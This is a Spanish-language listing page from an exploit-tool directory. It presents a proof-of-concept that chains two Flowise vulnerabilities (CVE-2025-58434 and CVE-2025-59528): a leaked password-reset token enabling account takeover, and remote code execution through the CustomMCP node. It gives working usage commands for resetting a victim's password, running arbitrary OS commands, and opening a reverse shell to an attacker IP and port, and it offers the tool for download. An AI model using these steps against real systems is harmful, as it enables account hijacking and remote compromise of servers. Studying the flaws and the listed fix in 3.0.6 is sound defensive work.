Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 y CVE-2025-59528 POC en cadena | Kitploit
Herramientas/GitHubGitHub/azureadtrent/cve-2025-58434-59528
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónHerramienta de Acceso Remoto
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 y CVE-2025-59528 POC en cadena

Ver Repositorio
47hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-58434 + CVE-2025-59528

Cadena de explotación para dos vulnerabilidades que afectan Flowise <= 3.0.5.


Vulnerabilidades

CVE-2025-58434 — Toma de Cuenta No Autenticada

El endpoint de olvido de contraseña devuelve un token de restablecimiento de contraseña válido en la respuesta de la API sin requerir autenticación. Un atacante con conocimiento de una dirección de correo electrónico válida puede restablecer la contraseña de cualquier cuenta sin interacción del usuario.

CVE-2025-59528 — Ejecución Remota de Código Autenticada

El nodo CustomMCP pasa la entrada controlada por el usuario directamente a un constructor Function() con privilegios completos de Node.js. Un usuario autenticado con una clave API válida puede ejecutar comandos arbitrarios del sistema operativo como el usuario del proceso de Flowise.

Corregido en: Flowise 3.0.6


Requisitos

  • Python 3.8+
  • pip install requests

Uso

Cadena ATO completa (restablece la contraseña, solicita clave API, dispara shell inversa):

python3 flowise_chain.py -t http://target -e [email protected]

Solo RCE (si ya tienes una clave API):

python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

Shell inversa con clave existente:

python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

Opciones

FlagDescripción
-t, --targetURL del objetivo
-e, --emailCorreo electrónico de la cuenta objetivo (activa la cadena ATO)
--api-keyProporcionar clave API directamente (omite ATO)
-c, --commandComando a ejecutar
--lhostIP del atacante para shell inversa
--lportPuerto del atacante para shell inversa (por defecto: 4444)
--new-passwordContraseña a establecer durante el restablecimiento (por defecto: Pwn3d!2026)
-k, --insecureOmitir verificación TLS

Notas

Debido a una peculiaridad en Flowise 3.0.5, el endpoint de la API de restablecimiento de contraseña no actualiza inmediatamente la credencial aceptada por el endpoint de inicio de sesión. El script se pausa después del restablecimiento y te solicita que inicies sesión manualmente en la interfaz de usuario y copies la clave API de /apikey.

Descargar herramienta